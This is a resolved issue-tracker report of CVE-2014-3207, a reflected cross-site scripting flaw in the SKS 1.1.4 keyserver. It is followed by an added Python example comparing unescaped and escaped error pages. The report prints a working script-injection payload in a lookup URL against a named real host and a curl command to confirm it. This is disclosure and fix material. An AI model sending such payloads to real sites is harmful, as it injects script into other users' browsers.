Issue #26 resolved

CVE-2014-3207: Unfiltered XSS

Anonymous created an issue

SKS 1.1.4 does not filter: /pks/lookup/undefined1<ScRiPt>prompt(972363)</ScRiPt>

For example:

http://gpg.mozilla.org/pks/lookup/undefined1<ScRiPt>prompt(972363)</ScRiPt>;

Note that recent browsers will urlencode this for you, thus the XSS only affects older browsers. You can verify this using curl, for example:

curl 'http://gpg.mozilla.org//pks/lookup/undefined1<ScRiPt>prompt(972363)</ScRiPt>';

Proposed fix: Filter input/output (or do not display the input at all).

Initial report and findings: https://bugzilla.mozilla.org/show_bug.cgi?id=952077 by Haris (whitehat@hotmail.rs)
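
The two fixes proposed in the report (encode on output, or do not display the input), shown beside the unfiltered behaviour with a regression check. This is an added example, not SKS code and not part of the original report: the error template, the function names, and the assumption that the server echoes the path exactly as received are hypothetical.

```python
import html
from urllib.parse import quote

# Request path taken from the report's example URL.
REPORTED_PATH = "/pks/lookup/undefined1<ScRiPt>prompt(972363)</ScRiPt>"

# Hypothetical error page; the report does not show the real SKS response body.
ERROR_TEMPLATE = (
    "<html><body><h1>Error handling request</h1>"
    "<p>Page not found: {path}</p></body></html>"
)


def render_error_unfiltered(path: str) -> str:
    """'Before' behaviour described in the report: the raw path is echoed."""
    return ERROR_TEMPLATE.format(path=path)


def render_error_escaped(path: str) -> str:
    """Fix option 1: HTML-encode the path at output time."""
    return ERROR_TEMPLATE.format(path=html.escape(path, quote=True))


def render_error_generic(path: str) -> str:
    """Fix option 2: do not display the request input at all."""
    return ERROR_TEMPLATE.format(path="(request path omitted)")


def reflects_raw_markup(body: str, path: str) -> bool:
    """Regression check: True if a path carrying HTML metacharacters
    appears verbatim (unencoded) in the response body."""
    has_markup = any(c in path for c in "<>\"'&")
    return has_markup and path in body


def as_sent_by_modern_browser(path: str) -> str:
    """Approximation of a recent browser percent-encoding the path
    before sending it, which is why the report limits impact to older ones."""
    return quote(path, safe="/")


if __name__ == "__main__":
    for render in (render_error_unfiltered, render_error_escaped, render_error_generic):
        body = render(REPORTED_PATH)
        print(render.__name__, "reflects raw markup:", reflects_raw_markup(body, REPORTED_PATH))
```

Encoding at output time is the fix that does not depend on what the client sent; the browser-side percent-encoding only happens to mask the bug.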
